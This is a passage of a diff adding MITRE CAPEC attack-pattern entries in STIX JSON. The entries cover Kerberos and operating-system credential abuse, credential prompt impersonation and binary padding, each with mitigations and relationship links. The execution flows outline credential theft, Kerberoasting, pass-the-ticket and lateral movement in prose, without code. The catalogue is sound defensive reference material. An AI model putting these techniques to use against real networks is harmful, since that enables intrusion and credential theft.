"target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.", + "external_references": [ + { + "external_id": "CAPEC-652", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/652.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "description": "Steal or Forge Kerberos Tickets", + "external_id": "T1558", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 
2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Kerberos Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]", + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. 
[REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Kerberos credentials: The adversary must obtain known Kerberos credentials in order to access the target system, application, or service within the domain.

  2. Techniques
    An adversary purchases breached Kerberos service account username/password combinations or leaked hashed passwords from the dark web.
    An adversary guesses the credentials to a weak Kerberos service account.
    An adversary conducts a sniffing attack to steal Kerberos tickets as they are transmitted.
    An adversary conducts a Kerberoasting attack.

Experiment

  1. Attempt Kerberos authentication: Try each Kerberos credential against various resources within the domain until the target grants access.

  2. Techniques
    Manually or automatically enter each Kerberos service account credential through the target's interface.
    Attempt a Pass the Ticket attack.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n Kerberos is the default authentication method for Windows domains and is also used across many operating systems. Attacks leveraging trusted Kerberos credentials can result in numerous consequences, depending on what Kerberos credential is stolen. For example, Kerberos service accounts are typically used to run services or scheduled tasks pertaining to authentication. However, these credentials are often weak and never expire, in addition to possessing local or domain administrator privileges. If an adversary is able to acquire these credentials, it could result in lateral movement within the domain or access to any resources the service account is privileged to access, among other things. Ultimately, successful spoofing and impersonation of trusted Kerberos credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f" + ], + "x_capec_prerequisites": [ + "The system/application leverages Kerberos authentication.", + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication for Kerberos service accounts.", + "The system/application does not have a sound password policy that is being enforced for Kerberos service accounts.", + "The system/application does not implement an effective password throttling mechanism for authenticating to Kerberos service accounts.", + "The targeted network allows for network sniffing attacks to succeed." + ], + "x_capec_resources_required": [ + "A valid Kerberos ticket or a known Kerberos service account credential." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Kerberos credential, leveraging it is trivial." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy for Kerberos service accounts.", + "id": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f1be939-d853-4d8a-95f3-0b617e01e652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Kerberos service accounts are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a90ffcb8-0f80-4e85-8b26-10496f6bb52a", + 
"modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--785c37de-0ec5-4060-874b-ee39ba235750", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of Kerberos service account credentials to log into domain systems.", + "id": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d34114ce-f6a3-4ab9-ba44-4d82771bf60f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow Kerberos service accounts to be a local administrator on more than one system.", + "id": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4ad929d-f0f1-40d2-b370-48856e8046d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable at least AES Kerberos encryption for tickets.", + "id": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "modified": 
"2022-09-29T00:00:00.000Z", + "name": "coa-652-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8864ef8-634a-4587-9b9f-7dffc85bb827", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6950a75-d731-468c-a735-bd8659dd2c6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. 
This applies to any Operating System.", + "external_references": [ + { + "external_id": "CAPEC-653", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/653.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Jeff Warren, How Attackers are Stealing Your Credentials with Mimikatz, 2017--07---11, STEALTHbits Technologies, Inc.", + "external_id": "REF-576", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/how-attackers-are-stealing-your-credentials-with-mimikatz/" + } + ], + "id": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Operating System Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. 
[REF-576]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known operating system credentials: The adversary must obtain known operating system credentials in order to access the target system, application, or service within the domain.

  2. Techniques
    An adversary purchases breached operating system username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal operating system credentials as they are transmitted.
    An adversary gains access to a system/files and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

Experiment

  1. Attempt authentication: Try each operating system credential against various systems, applications, and services within the domain until the target grants access.

  2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the network

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the network. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within system files or application configuration.

", + "x_capec_extended_description": "\n This attack can be extremely harmful when the operating system credentials used are for a root or admin user. Once an adversary gains access using credentials with elevated privileges, they are free to alter important system files which can effect other users who may use the system or other users on the system's network.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A list of known credentials for the targeted domain.", + "A custom script that leverages a credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the network.", + "id": "course-of-action--b1c371ce-f966-4db4-8193-eb03cd1d8190", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-653-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d717559-5a7c-4abe-994a-f5ed56626c2b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1c371ce-f966-4db4-8193-eb03cd1d8190", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--30fc8e66-ac77-4700-963e-64a29973924f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a406676c-8452-46d2-a72c-11463c53b3cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32a275d9-4766-40b2-ae6b-7307d384bf7b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fb187-a070-476a-914d-5c9f061558d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c81c0b14-89ac-4328-87fc-e5471e7edfc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37212961-3d05-427a-ada9-72ac4ca5adca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user's credentials.", + "external_references": [ + { + "external_id": "CAPEC-654", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + 
"source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + }, + { + "description": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt", + "external_id": "T1548.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548/004" + } + ], + "id": "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Prompt Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary randomly prompts a user to enter their system credentials, tricking the user into believing that a background process requires the credentials to function. The adversary can then use these gleaned credentials to execute additional attacks or obtain data." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing their credentials.

  2. Techniques
    Determine what tasks prompt a user for their credentials.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials.

  2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
", + "x_capec_extended_description": "\n The adversary may monitor the task list maintained by the operating system and wait for a specific legitimate credential prompt to become active. Once the prompt is detected, the adversary launches a new credential prompt in the foreground that mimics the user interface of the legitimate credential prompt. At this point, the user thinks that they are interacting with the legitimate credential prompt, but instead they are interacting with the malicious credential prompt.\n A second approach involves the adversary impersonating an unexpected credential prompt, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process or commonly used application (e.g., email reader) requires authentication for some purpose. The user, believing they are interacting with a legitimate credential prompt, enters their credentials which the adversary then leverages for nefarious purposes. The ultimate goal of this attack is to obtain sensitive information (e.g., credentials) from the user.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate credential prompt." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a credential prompt is not difficult." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--941eef6d-7520-4cb3-97db-3e53b6e58b9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "spec_version": "2.1", + "target_ref": "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions.\n In addition to this, adding data to a file also changes the file's hash, frustrating security tools that look for known bad files by their hash.\n ", + "external_references": [ + { + "external_id": "CAPEC-655", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/655.html" + }, + { + "description": "Obfuscated Files or Information:Binary padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Avoid Security Tool Identification by Adding Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 